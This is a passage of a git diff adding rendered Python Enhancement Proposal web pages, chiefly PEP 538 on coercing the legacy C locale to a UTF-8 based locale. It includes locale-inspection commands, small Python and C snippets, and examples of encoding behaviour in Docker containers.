  • PEP 564, Time functions with nanosecond resolution
  • +
  • PEP 565, Show DeprecationWarning in __main__
  • +
  • PEP 567, Context Variables
  • +
+
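For a concrete taste, two of the listed features exercised together +(runnable on 3.7+; the Release class is illustrative only):
+
from dataclasses import dataclass  # PEP 557
+import time                        # PEP 564 adds time.time_ns()
+
+@dataclass
+class Release:
+    version: str
+    when: str
+
+print(Release("3.7.0", "2018-06-27"))  # Release(version='3.7.0', when='2018-06-27')
+print(time.time_ns())                  # nanosecond-resolution timestamp
+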
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0537.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0538/index.html b/pep-0538/index.html new file mode 100644 index 00000000000..96eb6af62cb --- /dev/null +++ b/pep-0538/index.html @@ -0,0 +1,1326 @@ + + + + + + + + PEP 538 – Coercing the legacy C locale to a UTF-8 based locale | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 538 – Coercing the legacy C locale to a UTF-8 based locale

+
+
Author:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
BDFL-Delegate:
+
INADA Naoki
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
28-Dec-2016
+
Python-Version:
+
3.7
+
Post-History:
+
03-Jan-2017, +07-Jan-2017, +05-Mar-2017, +09-May-2017
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

An ongoing challenge with Python 3 on *nix systems is the conflict between +needing to use the configured locale encoding by default for consistency with +other locale-aware components in the same process or subprocesses, +and the fact that the standard C locale (as defined in POSIX:2001) typically +implies a default text encoding of ASCII, which is entirely inadequate for the +development of networked services and client applications in a multilingual +world.

+

PEP 540 proposes a change to CPython’s handling of the legacy C locale such +that CPython will assume the use of UTF-8 in such environments, rather than +persisting with the demonstrably problematic assumption of ASCII as an +appropriate encoding for communicating with operating system interfaces. +This is a good approach for cases where network encoding interoperability +is a more important concern than local encoding interoperability.

+

However, it comes at the cost of making CPython’s encoding assumptions diverge +from those of other locale-aware components in the same process, as well as +those of components running in subprocesses that share the same environment.

+

This can cause interoperability problems with some extension modules (such as +GNU readline’s command line history editing), as well as with components +running in subprocesses (such as older Python runtimes).

+

It also requires non-trivial changes to the internals of how CPython itself +works, rather than relying primarily on existing configuration settings that +are supported by Python versions prior to Python 3.7.

+

Accordingly, this PEP proposes that independently of the UTF-8 mode proposed +in PEP 540, the way the CPython implementation handles the default C locale be +changed to be roughly equivalent to the following existing configuration +settings (supported since Python 3.1):

+
LC_CTYPE=C.UTF-8
+PYTHONIOENCODING=utf-8:surrogateescape
+
+
+

The exact target locale for coercion will be chosen from a predefined list at +runtime based on the actually available locales.

+

The reinterpreted locale settings will be written back to the environment so +they’re visible to other components in the same process and in subprocesses, +but the changed PYTHONIOENCODING default will be made implicit in order to +avoid causing compatibility problems with Python 2 subprocesses that don’t +provide the surrogateescape error handler.

+

The new legacy locale coercion behavior can be disabled either by setting +LC_ALL (which may still lead to a Unicode compatibility warning) or by +setting the new PYTHONCOERCECLOCALE environment variable to 0.

+

With this change, any *nix platform that does not offer at least one of the +C.UTF-8, C.utf8 or UTF-8 locales as part of its standard +configuration would only be considered a fully supported platform for CPython +3.7+ deployments when a suitable locale other than the default C locale is +configured explicitly (e.g. en_AU.UTF-8, zh_CN.gb18030). If PEP 540 is +accepted in addition to this PEP, then pure Python modules would also be +supported when using the proposed PYTHONUTF8 mode, but expectations for +full Unicode compatibility in extension modules would continue to be limited +to the platforms covered by this PEP.

+

As it only reflects a change in default settings rather than a fundamentally +new capability, redistributors (such as Linux distributions) with a narrower +target audience than the upstream CPython development team may also choose to +opt in to this locale coercion behaviour for the Python 3.6.x series by +applying the necessary changes as a downstream patch.

+
+
+

Implementation Notes

+

Attempting to implement the PEP as originally accepted showed that the +proposal to emit locale coercion and compatibility warnings by default +simply wasn’t practical (there were too many cases where previously working +code failed because of the warnings, rather than because of latent locale +handling defects in the affected code).

+

As a result, the PY_WARN_ON_C_LOCALE config flag was removed, and replaced +with a runtime PYTHONCOERCECLOCALE=warn environment variable setting +that allows developers and system integrators to opt-in to receiving locale +coercion and compatibility warnings, without emitting them by default.

+

The output examples in the PEP itself have also been updated to remove +the warnings and make them easier to read.

+
+
+

Background

+

While the CPython interpreter is starting up, it may need to convert from +the char * format to the wchar_t * format, or from one of those formats +to PyUnicodeObject *, in a way that’s consistent with the locale settings +of the overall system. It handles these cases by relying on the operating +system to do the conversion and then ensuring that the text encoding name +reported by sys.getfilesystemencoding() matches the encoding used during +this early bootstrapping process.

+
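The outcome of this bootstrapping can be inspected from Python itself; a +quick check (output naturally varies with the active locale):
+
import locale, sys
+
+print(locale.setlocale(locale.LC_CTYPE))  # query only; e.g. 'en_AU.UTF-8' or 'C'
+print(sys.getfilesystemencoding())        # e.g. 'utf-8' or 'ascii'
+print(sys.stdout.encoding, sys.stdout.errors)
+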

On Windows, the limitations of the mbcs format used by default in these +conversions proved sufficiently problematic that PEP 528 and PEP 529 were +implemented to bypass the operating system supplied interfaces for binary data +handling and force the use of UTF-8 instead.

+

On Mac OS X, iOS, and Android, many components, including CPython, already +assume the use of UTF-8 as the system encoding, regardless of the locale +setting. However, this isn’t the case for all components, and the discrepancy +can cause problems in some situations (for example, when using the GNU readline +module [16]).

+

On non-Apple and non-Android *nix systems, these operations are handled using +the C locale system in glibc, which has the following characteristics [4]:

+
    +
  • by default, all processes start in the C locale, which uses ASCII +for these conversions. This is almost never what anyone doing multilingual +text processing actually wants (including CPython and C/C++ GUI frameworks).
  • +
  • calling setlocale(LC_ALL, "") reconfigures the active locale based on +the locale categories configured in the current process environment
  • +
  • if the locale requested by the current environment is unknown, or no specific +locale is configured, then the default C locale will remain active
  • +
+

The specific locale category that covers the APIs that CPython depends on is +LC_CTYPE, which applies to “classification and conversion of characters, +and to multibyte and wide characters” [5]. Accordingly, CPython includes the +following key calls to setlocale:

+
    +
  • in the main python binary, CPython calls setlocale(LC_ALL, "") to +configure the entire C locale subsystem according to the process environment. +It does this prior to making any calls into the shared CPython library
  • +
  • in Py_Initialize, CPython calls setlocale(LC_CTYPE, ""), such that +the configured locale settings for that category always match those set in +the environment. It does this unconditionally, and it doesn’t revert the +process state change in Py_Finalize
  • +
+

(This summary of the locale handling omits several technical details related +to exactly where and when the text encoding declared as part of the locale +settings is used - see PEP 540 for further discussion, as these particular +details matter more when decoupling CPython from the declared C locale than +they do when overriding the locale with one based on UTF-8)

+

These calls are usually sufficient to provide sensible behaviour, but they can +still fail in the following cases:

+
    +
  • SSH environment forwarding means that SSH clients may sometimes forward +client locale settings to servers that don’t have that locale installed. This +leads to CPython running in the default ASCII-based C locale
  • +
  • some process environments (such as Linux containers) may not have any +explicit locale configured at all. As with unknown locales, this leads to +CPython running in the default ASCII-based C locale
  • +
  • on Android, rather than configuring the locale based on environment variables, +the empty locale "" is treated as specifically requesting the "C" +locale
  • +
+

The simplest way to deal with this problem for currently released versions of +CPython is to explicitly set a more sensible locale when launching the +application. For example:

+
LC_CTYPE=C.UTF-8 python3 ...
+
+
+

The C.UTF-8 locale is a full locale definition that uses UTF-8 for the +LC_CTYPE category, and the same settings as the C locale for all other +categories (including LC_COLLATE). It is offered by a number of Linux +distributions (including Debian, Ubuntu, Fedora, Alpine and Android) as an +alternative to the ASCII-based C locale. Some other platforms (such as +HP-UX) offer an equivalent locale definition under the name C.utf8.

+

Mac OS X and other *BSD systems have taken a different approach: instead of +offering a C.UTF-8 locale, they offer a partial UTF-8 locale that only +defines the LC_CTYPE category. On such systems, the preferred +environmental locale adjustment is to set LC_CTYPE=UTF-8 rather than to set +LC_ALL or LANG. [17]

+

In the specific case of Docker containers and similar technologies, the +appropriate locale setting can be specified directly in the container image +definition.

+

Another common failure case is developers specifying LANG=C in order to +see otherwise translated user interface messages in English, rather than the +more narrowly scoped LC_MESSAGES=C or LANGUAGE=en.

+
+
+

Relationship with other PEPs

+

This PEP shares a common problem statement with PEP 540 (improving Python 3’s +behaviour in the default C locale), but diverges markedly in the proposed +solution:

+
    +
  • PEP 540 proposes to entirely decouple CPython’s default text encoding from +the C locale system in that case, allowing text handling inconsistencies to +arise between CPython and other locale-aware components running in the same +process and in subprocesses. This approach aims to make CPython behave less +like a locale-aware application, and more like locale-independent language +runtimes like those for Go, Node.js (V8), and Rust
  • +
  • this PEP proposes to override the legacy C locale with a more recently +defined locale that uses UTF-8 as its default text encoding. This means that +the text encoding override will apply not only to CPython, but also to any +locale-aware extension modules loaded into the current process, as well as to +locale-aware applications invoked in subprocesses that inherit their +environment from the parent process. This approach aims to retain CPython’s +traditional strong support for integration with other locale-aware components +while also actively helping to push forward the adoption and standardisation +of the C.UTF-8 locale as a Unicode-aware replacement for the legacy C locale +in the wider C/C++ ecosystem
  • +
+

After reviewing both PEPs, it became clear that they didn’t actually conflict +at a technical level, and the proposal in PEP 540 offered a superior option in +cases where no suitable locale was available, as well as offering a better +reference behaviour for platforms where the notion of a “locale encoding” +doesn’t make sense (for example, embedded systems running MicroPython rather +than the CPython reference interpreter).

+

Meanwhile, this PEP offered improved compatibility with other locale-aware +components, and an approach more amenable to being backported to Python 3.6 +by downstream redistributors.

+

As a result, this PEP was amended to refer to PEP 540 as a complementary +solution that offered improved behaviour when none of the standard UTF-8 based +locales were available, as well as extending the changes in the default +settings to APIs that aren’t currently independently configurable (such as +the default encoding and error handler for open()).

+

The availability of PEP 540 also meant that the LC_CTYPE=en_US.UTF-8 legacy +fallback was removed from the list of UTF-8 locales tried as a coercion target, +with the expectation being that CPython will instead rely solely on the +proposed PYTHONUTF8 mode in such cases.

+
+
+

Motivation

+

While Linux container technologies like Docker, Kubernetes, and OpenShift are +best known for their use in web service development, the related container +formats and execution models are also being adopted for Linux command line +application development. Technologies like Gnome Flatpak [7] and +Ubuntu Snappy [8] further aim to bring these same techniques to Linux GUI +application development.

+

When using Python 3 for application development in these contexts, it isn’t +uncommon to see text encoding related errors akin to the following:

+
$ docker run --rm fedora:25 python3 -c 'print("ℙƴ☂ℌøἤ")'
+Unable to decode the command from the command line:
+UnicodeEncodeError: 'utf-8' codec can't encode character '\udce2' in position 7: surrogates not allowed
+$ docker run --rm ncoghlan/debian-python python3 -c 'print("ℙƴ☂ℌøἤ")'
+Unable to decode the command from the command line:
+UnicodeEncodeError: 'utf-8' codec can't encode character '\udce2' in position 7: surrogates not allowed
+
+
+

Even though the same command is likely to work fine when run locally:

+
$ python3 -c 'print("ℙƴ☂ℌøἤ")'
+ℙƴ☂ℌøἤ
+
+
+

The source of the problem can be seen by instead running the locale command +in the three environments:

+
$ locale | grep -E 'LC_ALL|LC_CTYPE|LANG'
+LANG=en_AU.UTF-8
+LC_CTYPE="en_AU.UTF-8"
+LC_ALL=
+$ docker run --rm fedora:25 locale | grep -E 'LC_ALL|LC_CTYPE|LANG'
+LANG=
+LC_CTYPE="POSIX"
+LC_ALL=
+$ docker run --rm ncoghlan/debian-python locale | grep -E 'LC_ALL|LC_CTYPE|LANG'
+LANG=
+LANGUAGE=
+LC_CTYPE="POSIX"
+LC_ALL=
+
+
+

In this particular example, we can see that the host system locale is set to +“en_AU.UTF-8”, so CPython uses UTF-8 as the default text encoding. By contrast, +the base Docker images for Fedora and Debian don’t have any specific locale +set, so they use the POSIX locale by default, which is an alias for the +ASCII-based default C locale.

+

The simplest way to get Python 3 (regardless of the exact version) to behave +sensibly in Fedora and Debian based containers is to run it in the C.UTF-8 +locale that both distros provide:

+
$ docker run --rm -e LC_CTYPE=C.UTF-8 fedora:25 python3 -c 'print("ℙƴ☂ℌøἤ")'
+ℙƴ☂ℌøἤ
+$ docker run --rm -e LC_CTYPE=C.UTF-8 ncoghlan/debian-python python3 -c 'print("ℙƴ☂ℌøἤ")'
+ℙƴ☂ℌøἤ
+
+$ docker run --rm -e LC_CTYPE=C.UTF-8 fedora:25 locale | grep -E 'LC_ALL|LC_CTYPE|LANG'
+LANG=
+LC_CTYPE=C.UTF-8
+LC_ALL=
+$ docker run --rm -e LC_CTYPE=C.UTF-8 ncoghlan/debian-python locale | grep -E 'LC_ALL|LC_CTYPE|LANG'
+LANG=
+LANGUAGE=
+LC_CTYPE=C.UTF-8
+LC_ALL=
+
+
+

The Alpine Linux based Python images provided by Docker, Inc. already use the +C.UTF-8 locale by default:

+
$ docker run --rm python:3 python3 -c 'print("ℙƴ☂ℌøἤ")'
+ℙƴ☂ℌøἤ
+$ docker run --rm python:3 locale | grep -E 'LC_ALL|LC_CTYPE|LANG'
+LANG=C.UTF-8
+LANGUAGE=
+LC_CTYPE="C.UTF-8"
+LC_ALL=
+
+
+

Similarly, for custom container images (i.e. those adding additional content on +top of a base distro image), a more suitable locale can be set in the image +definition so everything just works by default. However, it would provide a much +nicer and more consistent user experience if CPython were able to just deal +with this problem automatically rather than relying on redistributors or end +users to handle it through system configuration changes.

+

While the glibc developers are working towards making the C.UTF-8 locale +universally available for use by glibc based applications like CPython [6], +this unfortunately doesn’t help on platforms that ship older versions of glibc +without that feature, and also don’t provide C.UTF-8 (or an equivalent) as an +on-disk locale the way Debian and Fedora do. These platforms are considered +out of scope for this PEP - see PEP 540 for further discussion of possible +options for improving CPython’s default behaviour in such environments.

+
+
+

Design Principles

+

The above motivation leads to the following core design principles for the +proposed solution:

+
    +
  • if a locale other than the default C locale is explicitly configured, we’ll +continue to respect it
  • +
  • as far as is feasible, any changes made will use existing configuration +options
  • +
  • Python’s runtime behaviour in potential coercion target locales should be +identical regardless of whether the locale was set explicitly in the +environment or implicitly as a locale coercion target
  • +
  • for Python 3.7, if we’re changing the locale setting without an explicit +config option, we’ll emit a warning on stderr that we’re doing so rather +than silently changing the process configuration. This will alert application +and system integrators to the change, even if they don’t closely follow the +PEP process or Python release announcements. However, to minimize the chance +of introducing new problems for end users, we’ll do this without using the +warnings system, so even running with -Werror won’t turn it into a runtime +exception. (Note: these warnings ended up being silenced by default. See the +Implementation Note above for more details)
  • +
  • for Python 3.7, any changed defaults will offer some form of explicit “off” +switch at build time, runtime, or both
  • +
+

Minimizing the negative impact on systems currently correctly configured to +use GB-18030 or another partially ASCII compatible universal encoding leads to +the following design principle:

+
    +
  • if a UTF-8 based Linux container is run on a host that is explicitly +configured to use a non-UTF-8 encoding, and tries to exchange locally +encoded data with that host rather than exchanging explicitly UTF-8 encoded +data, CPython will endeavour to correctly round-trip host provided data that +is concatenated or split solely at common ASCII compatible code points, but +may otherwise emit nonsensical results.
  • +
+

Minimizing the negative impact on systems and programs correctly configured to +use an explicit locale category like LC_TIME, LC_MONETARY or +LC_NUMERIC while otherwise running in the legacy C locale gives the +following design principles:

+
    +
  • don’t make any environmental changes that would alter any existing settings +for locale categories other than LC_CTYPE (most notably: don’t set +LC_ALL or LANG)
  • +
+

Finally, maintaining compatibility with running arbitrary subprocesses in +orchestration use cases leads to the following design principle:

+
    +
  • don’t make any Python-specific environmental changes that might be +incompatible with any still supported version of CPython (including +CPython 2.7)
  • +
+
+
+

Specification

+

To better handle the cases where CPython would otherwise end up attempting +to operate in the C locale, this PEP proposes that CPython automatically +attempt to coerce the legacy C locale to a UTF-8 based locale for the +LC_CTYPE category when it is run as a standalone command line application.

+

It further proposes to emit a warning on stderr if the legacy C locale +is in effect for the LC_CTYPE category at the point where the language +runtime itself is initialized, +and the explicit environmental flag to disable locale coercion is not set, in +order to warn system and application integrators that they’re running CPython +in an unsupported configuration.

+

In addition to these general changes, some additional Android-specific changes +are proposed to handle the differences in the behaviour of setlocale on that +platform.

+
+

Legacy C locale coercion in the standalone Python interpreter binary

+

When run as a standalone application, CPython has the opportunity to +reconfigure the C locale before any locale dependent operations are executed +in the process.

+

This means that it can change the locale settings not only for the CPython +runtime, but also for any other locale-aware components running in the current +process (e.g. as part of extension modules), as well as in subprocesses that +inherit their environment from the current process.

+

After calling setlocale(LC_ALL, "") to initialize the locale settings in +the current process, the main interpreter binary will be updated to include +the following call:

+
const char *ctype_loc = setlocale(LC_CTYPE, NULL);
+
+
+

This cryptic invocation is the API that C provides to query the current locale +setting without changing it. Given that query, it is possible to check for +exactly the C locale with strcmp:

+
ctype_loc != NULL && strcmp(ctype_loc, "C") == 0  /* true only in the C locale */
+
+
+

This call also returns "C" when either no particular locale is set, or the +nominal locale is set to an alias for the C locale (such as POSIX).

+
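A rough Python-level analogue of this detection (illustrative only; the real +check runs in C before the interpreter is initialized):
+
import locale
+
+ctype_loc = locale.setlocale(locale.LC_CTYPE)  # query without changing
+print(ctype_loc, ctype_loc in ("C", "POSIX"))  # True means legacy C locale
+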

Given this information, CPython can then attempt to coerce the locale to one +that uses UTF-8 rather than ASCII as the default encoding.

+

Three such locales will be tried:

+
    +
  • C.UTF-8 (available at least in Debian, Ubuntu, Alpine, and Fedora 25+, and +expected to be available by default in a future version of glibc)
  • +
  • C.utf8 (available at least in HP-UX)
  • +
  • UTF-8 (available in at least some *BSD variants, including Mac OS X)
  • +
+

The coercion will be implemented by setting the LC_CTYPE environment +variable to the candidate locale name, such that future calls to +setlocale() will see it, as will other components looking for those +settings (such as GUI development frameworks and Python’s own locale +module).

+

To allow for better cross-platform binary portability and to adjust +automatically to future changes in locale availability, these checks will be +implemented at runtime on all platforms other than Windows, rather than +attempting to determine which locales to try at compile time.

+
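A hedged Python sketch of that runtime probe follows; the shipped +implementation is C code that runs before Py_Main, and +first_available_utf8_locale is an illustrative name:
+
import locale
+
+CANDIDATES = ("C.UTF-8", "C.utf8", "UTF-8")
+
+def first_available_utf8_locale():
+    saved = locale.setlocale(locale.LC_CTYPE)  # remember current setting
+    try:
+        for name in CANDIDATES:
+            try:
+                locale.setlocale(locale.LC_CTYPE, name)
+                return name
+            except locale.Error:
+                continue
+        return None
+    finally:
+        locale.setlocale(locale.LC_CTYPE, saved)  # restore
+
+print(first_available_utf8_locale())  # e.g. 'C.UTF-8' on most Linux distros
+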

When this locale coercion is activated, the following warning will be +printed on stderr, with the warning containing whichever locale was +successfully configured:

+
Python detected LC_CTYPE=C: LC_CTYPE coerced to C.UTF-8 (set another
+locale or PYTHONCOERCECLOCALE=0 to disable this locale coercion behaviour).
+
+
+

(Note: this warning ended up being silenced by default. See the +Implementation Note above for more details)

+

As long as the current platform provides at least one of the candidate UTF-8 +based environments, this locale coercion will mean that the standard +Python binary and locale-aware extensions should once again “just work” +in the three main failure cases we’re aware of (missing locale +settings, SSH forwarding of unknown locales via LANG or LC_CTYPE, and +developers explicitly requesting LANG=C).

+

The one case where failures may still occur is when stderr is specifically +being checked for no output, which can be resolved either by configuring +a locale other than the C locale, or else by using a mechanism other than +“there was no output on stderr” to check for subprocess errors (e.g. checking +process return codes).

+

If none of the candidate locales are successfully configured, or the LC_ALL +locale override is defined in the current process environment, then +initialization will continue in the C locale and the Unicode compatibility +warning described in the next section will be emitted just as it would for +any other application.

+

If PYTHONCOERCECLOCALE=0 is explicitly set, initialization will continue in +the C locale and the Unicode compatibility warning described in the next +section will be automatically suppressed.

+

The interpreter will always check for the PYTHONCOERCECLOCALE environment +variable at startup (even when running under the -E or -I switches), +as the locale coercion check necessarily takes place before any command line +argument processing. For consistency, the runtime check to determine whether +or not to suppress the locale compatibility warning will be similarly +independent of these settings.

+
+
+

Legacy C locale warning during runtime initialization

+

By the time that Py_Initialize is called, arbitrary locale-dependent +operations may have taken place in the current process. This means that +by the time it is called, it is too late to reliably switch to a different +locale - doing so would introduce inconsistencies in decoded text, even in the +context of the standalone Python interpreter binary.

+

Accordingly, when Py_Initialize is called and CPython detects that the +configured locale is still the default C locale and +PYTHONCOERCECLOCALE=0 is not set, the following warning will be issued:

+
Python runtime initialized with LC_CTYPE=C (a locale with default ASCII
+encoding), which may cause Unicode compatibility problems. Using C.UTF-8,
+C.utf8, or UTF-8 (if available) as alternative Unicode-compatible
+locales is recommended.
+
+
+

(Note: this warning ended up being silenced by default. See the +Implementation Note above for more details)

+

In this case, no actual change will be made to the locale settings.

+

Instead, the warning informs both system and application integrators that +they’re running Python 3 in a configuration that we don’t expect to work +properly.

+

The second sentence providing recommendations may eventually be conditionally +compiled based on the operating system (e.g. recommending LC_CTYPE=UTF-8 +on *BSD systems), but the initial implementation will just use the common +generic message shown above.

+
+
+

New build-time configuration options

+

While both of the above behaviours would be enabled by default, they would +also have new associated configuration options and preprocessor definitions +for the benefit of redistributors that want to override those default settings.

+

The locale coercion behaviour would be controlled by the flag +--with[out]-c-locale-coercion, which would set the PY_COERCE_C_LOCALE +preprocessor definition.

+

The locale warning behaviour would be controlled by the flag +--with[out]-c-locale-warning, which would set the PY_WARN_ON_C_LOCALE +preprocessor definition.

+

(Note: this compile time warning option ended up being replaced by a runtime +PYTHONCOERCECLOCALE=warn option. See the Implementation Note above for +more details)

+

On platforms which don’t use the autotools based build system (i.e. +Windows) these preprocessor variables would always be undefined.

+
+
+

Changes to the default error handling on the standard streams

+

Since Python 3.5, CPython has defaulted to using surrogateescape on the +standard streams (sys.stdin, sys.stdout) when it detects that the +current locale is C and no specific error handler has been set using +either the PYTHONIOENCODING environment variable or the +Py_setStandardStreamEncoding API. For other locales, the default error +handler for the standard streams is strict.

+

In order to preserve this behaviour without introducing any behavioural +discrepancies between locale coercion and explicitly configuring a locale, the +coercion target locales (C.UTF-8, C.utf8, and UTF-8) will be added +to the list of locales that use surrogateescape as their default error +handler for the standard streams.

+

No changes are proposed to the default error handler for sys.stderr: that +will continue to be backslashreplace.

+
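For readers unfamiliar with the handler, a minimal demonstration of how +surrogateescape round-trips bytes that aren't valid UTF-8 (runnable on any +Python 3):
+
raw = b"\x81\x36\xbd\x36"  # GB18030 bytes that are invalid as UTF-8
+text = raw.decode("utf-8", errors="surrogateescape")
+print(repr(text))  # lone surrogates '\udc81' and '\udcbd' stand in for the bad bytes
+assert text.encode("utf-8", errors="surrogateescape") == raw  # exact round-trip
+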
+
+

Changes to locale settings on Android

+

Independently of the other changes in this PEP, CPython on Android systems +will be updated to call setlocale(LC_ALL, "C.UTF-8") where it currently +calls setlocale(LC_ALL, "") and setlocale(LC_CTYPE, "C.UTF-8") where +it currently calls setlocale(LC_CTYPE, "").

+

This Android-specific behaviour is being introduced due to the following +Android-specific details:

+
    +
  • on Android, passing "" to setlocale is equivalent to passing "C"
  • +
  • the C.UTF-8 locale is always available
  • +
+
+
+
+

Platform Support Changes

+

A new “Legacy C Locale” section will be added to PEP 11 that states:

+
    +
  • as of CPython 3.7, *nix platforms are expected to provide at least one of +C.UTF-8 (full locale), C.utf8 (full locale) or UTF-8 ( +LC_CTYPE-only locale) as an alternative to the legacy C locale. +Any Unicode related integration problems that occur only in the legacy C +locale and cannot be reproduced in an appropriately configured non-ASCII +locale will be closed as “won’t fix”.
  • +
+
+
+

Rationale

+
+

Improving the handling of the C locale

+

It has been clear for some time that the C locale’s default encoding of +ASCII is entirely the wrong choice for development of modern networked +services. Newer languages like Rust and Go have eschewed that default entirely, +and instead made it a deployment requirement that systems be configured to use +UTF-8 as the text encoding for operating system interfaces. Similarly, Node.js +assumes UTF-8 by default (a behaviour inherited from the V8 JavaScript engine) +and requires custom build settings to indicate it should use the system +locale settings for locale-aware operations. Both the JVM and the .NET CLR +use UTF-16-LE as their primary encoding for passing text between applications +and the application runtime (i.e. the JVM/CLR, not the host operating system).

+

The challenge for CPython has been the fact that in addition to being used for +network service development, it is also extensively used as an embedded +scripting language in larger applications, and as a desktop application +development language, where it is more important to be consistent with other +locale-aware components sharing the same process, as well as with the user’s +desktop locale settings, than it is with the emergent conventions of modern +network service development.

+

The core premise of this PEP is that for all of these use cases, the +assumption of ASCII implied by the default “C” locale is the wrong choice, +and furthermore that the following assumptions are valid:

+
    +
  • in desktop application use cases, the process locale will already be +configured appropriately, and if it isn’t, then that is an operating system +or embedding application level problem that needs to be reported to and +resolved by the operating system provider or application developer
  • +
  • in network service development use cases (especially those based on Linux +containers), the process locale may not be configured at all, and if it +isn’t, then the expectation is that components will impose their own default +encoding the way Rust, Go and Node.js do, rather than trusting the legacy C +default encoding of ASCII the way CPython currently does
  • +
+
+
+

Defaulting to “surrogateescape” error handling on the standard IO streams

+

By coercing the locale away from the legacy C default and its assumption of +ASCII as the preferred text encoding, this PEP also disables the implicit use +of the “surrogateescape” error handler on the standard IO streams that was +introduced in Python 3.5 ([15]), as well as the automatic use of +surrogateescape when operating in PEP 540’s proposed UTF-8 mode.

+

Rather than introducing yet another configuration option to adjust that +behaviour, this PEP instead proposes to extend the “surrogateescape” default +for stdin and stderr error handling to also apply to the three +potential coercion target locales.

+

The aim of this behaviour is to attempt to ensure that operating system +provided text values can typically be passed transparently through a +Python 3 application even if the application is wrong in assuming that the +text has been encoded as UTF-8.

+

In particular, GB 18030 [12] is a Chinese national text encoding standard +that handles all Unicode code points and is formally incompatible with both +ASCII and UTF-8, but will nevertheless often tolerate processing as surrogate +escaped data - the points where GB 18030 reuses ASCII byte values in an +incompatible way are likely to be invalid in UTF-8, and will therefore be +escaped and opaque to string processing operations that split on or search for +the relevant ASCII code points. Operations that don’t involve splitting on or +searching for particular ASCII or Unicode code point values are almost +certain to work correctly.

+

Similarly, Shift-JIS [13] and ISO-2022-JP [14] remain in widespread use in +Japan, and are incompatible with both ASCII and UTF-8, but will tolerate text +processing operations that don’t involve splitting on or searching for +particular ASCII or Unicode code point values.

+

As an example, consider two files, one encoded with UTF-8 (the default encoding +for en_AU.UTF-8), and one encoded with GB-18030 (the default encoding for +zh_CN.gb18030):

+
$ python3 -c 'open("utf8.txt", "wb").write("ℙƴ☂ℌøἤ\n".encode("utf-8"))'
+$ python3 -c 'open("gb18030.txt", "wb").write("ℙƴ☂ℌøἤ\n".encode("gb18030"))'
+
+
+

On disk, we can see that these are two very different files:

+
$ python3 -c 'print("UTF-8:  ", open("utf8.txt", "rb").read().strip()); \
+              print("GB18030:", open("gb18030.txt", "rb").read().strip())'
+UTF-8:   b'\xe2\x84\x99\xc6\xb4\xe2\x98\x82\xe2\x84\x8c\xc3\xb8\xe1\xbc\xa4\n'
+GB18030: b'\x816\xbd6\x810\x9d0\x817\xa29\x816\xbc4\x810\x8b3\x816\x8d6\n'
+
+
+

That nevertheless can both be rendered correctly to the terminal as long as +they’re decoded prior to printing:

+
$ python3 -c 'print("UTF-8:  ", open("utf8.txt", "r", encoding="utf-8").read().strip()); \
+              print("GB18030:", open("gb18030.txt", "r", encoding="gb18030").read().strip())'
+UTF-8:   ℙƴ☂ℌøἤ
+GB18030: ℙƴ☂ℌøἤ
+
+
+

By contrast, if we just pass along the raw bytes, as cat and similar C/C++ +utilities will tend to do:

+
$ LANG=en_AU.UTF-8 cat utf8.txt gb18030.txt
+ℙƴ☂ℌøἤ
+�6�6�0�0�7�9�6�4�0�3�6�6
+
+
+

Even setting a specifically Chinese locale won’t help in getting the +GB-18030 encoded file rendered correctly:

+
$ LANG=zh_CN.gb18030 cat utf8.txt gb18030.txt
+ℙƴ☂ℌøἤ
+�6�6�0�0�7�9�6�4�0�3�6�6
+
+
+

The problem is that the terminal encoding setting remains UTF-8, regardless +of the nominal locale. A GB18030 terminal can be emulated using the iconv +utility:

+
$ cat utf8.txt gb18030.txt | iconv -f GB18030 -t UTF-8
+鈩櫰粹槀鈩屆羔激
+ℙƴ☂ℌøἤ
+
+
+

This reverses the problem, such that the GB18030 file is rendered correctly, +but the UTF-8 file has been converted to unrelated hanzi characters, rather than +the expected rendering of “Python” as non-ASCII characters.

+

With the emulated GB18030 terminal encoding, assuming UTF-8 in Python results +in both files being displayed incorrectly:

+
$ python3 -c 'print("UTF-8:  ", open("utf8.txt", "r", encoding="utf-8").read().strip()); \
+              print("GB18030:", open("gb18030.txt", "r", encoding="gb18030").read().strip())' \
+  | iconv -f GB18030 -t UTF-8
+UTF-8:   鈩櫰粹槀鈩屆羔激
+GB18030: 鈩櫰粹槀鈩屆羔激
+
+
+

However, setting the locale correctly means that the emulated GB18030 terminal +now displays both files as originally intended:

+
$ LANG=zh_CN.gb18030 \
+  python3 -c 'print("UTF-8:  ", open("utf8.txt", "r", encoding="utf-8").read().strip()); \
+              print("GB18030:", open("gb18030.txt", "r", encoding="gb18030").read().strip())' \
+  | iconv -f GB18030 -t UTF-8
+UTF-8:   ℙƴ☂ℌøἤ
+GB18030: ℙƴ☂ℌøἤ
+
+
+

The rationale for retaining surrogateescape as the default IO encoding is +that it will preserve the following helpful behaviour in the C locale:

+
$ cat gb18030.txt \
+  | LANG=C python3 -c "import sys; print(sys.stdin.read())" \
+  | iconv -f GB18030 -t UTF-8
+ℙƴ☂ℌøἤ
+
+
+

Rather than reverting to the exception currently seen when a UTF-8 based locale is +explicitly configured:

+
$ cat gb18030.txt \
+  | python3 -c "import sys; print(sys.stdin.read())" \
+  | iconv -f GB18030 -t UTF-8
+Traceback (most recent call last):
+File "<string>", line 1, in <module>
+File "/usr/lib64/python3.5/codecs.py", line 321, in decode
+    (result, consumed) = self._buffer_decode(data, self.errors, final)
+UnicodeDecodeError: 'utf-8' codec can't decode byte 0x81 in position 0: invalid start byte
+
+
+

As an added benefit, environments explicitly configured to use one of the +coercion target locales will implicitly gain the encoding transparency behaviour +currently enabled by default in the C locale.

+
+
+

Avoiding setting PYTHONIOENCODING during UTF-8 locale coercion

+

Rather than changing the default handling of the standard streams during +interpreter initialization, earlier versions of this PEP proposed setting +PYTHONIOENCODING to utf-8:surrogateescape. This turned out to create +a significant compatibility problem: since the surrogateescape handler +only exists in Python 3.1+, running Python 2.7 processes in subprocesses could +potentially break in a confusing way with that configuration.

+

